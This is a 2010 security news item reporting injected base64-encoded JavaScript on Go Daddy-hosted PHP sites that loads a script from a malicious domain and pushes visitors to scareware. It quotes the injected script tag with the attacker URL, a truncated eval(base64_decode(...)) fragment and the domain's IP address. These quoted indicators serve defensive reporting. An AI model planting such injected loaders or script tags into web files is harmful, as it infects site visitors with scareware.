Websites Hosted at Go Daddy Attacked and Exploited Again

According to a latest warning raised by the researchers at Sucuri Security (a firm running a web integrity monitoring service) a number of websites harbored at Go Daddy (an Internet domain registrar) have had malicious code injected into their webpages.

The warning informs that there are an uncertain number of websites harbored at Go Daddy that have been attacked and abused. The research shows that this is an ongoing issue that commenced over last couple of days.

All infected websites had base 64 encoded JavaScript attached to all of their PHP files. The rogue scripting decodes to a <script> element, which installs content from a third-party domain. All the websites tested till now enclose the following JavaScript attached to all PHP files: <script src=http://myblindstudioinfoonline.com/ll.php Which are generated by a very long eval (base64_decode line: eval(base64_decode("aWYoZnVuY3Rpb.

The external code leads the users to a scareware distribution website, which imitates an antivirus scan and exhibits various bogus alerts about infections on their systems. The objective of this scam is to trap users to purchase licenses for a useless application, which claims to be capable of removing malware that never existed.

As per security experts, it's unlikely that Go Daddy's own infrastructure is responsible for this mass attack. The reason behind why all infected websites are harbored in the same place is because criminals first scan the IP space of big hosting providers, to create a list of vulnerable websites and then attack them all together.

According to a statement published on sucuri blog website on September 17, 2010, what was interesting about the attack was that the domain was registered by the same people accountable for the past attacks at BlueHost, Go Daddy, etc.

Other groups such as, BlueHost or media temple, Network Solutions also had to face same incidents previously, some of them even repetitively.

But the most terrible thing about this case is the malicious domain yblindstudioinfoonline dot com (77.78.239.53) is not blacklisted, thus it has the potential to attack a very large number of visitors, particularly visitors with obsolete AV signatures and definitions.

Hence, users are recommended to use an updated version of legal anti-virus to avoid being victimized to these kinds of attacks.

Related article: Websites – The Latest Weapon in The Hands of Phishers

» SPAMfighter News - 01-10-2010

3 simple steps to update drivers on your Windows PCSlow PC? Optimize your Slow PC with SLOW-PCfighter!Email Cluttered with Spam? Free Spam Filter!

Exchange Anti Spam Filter
Go back to previous page
Next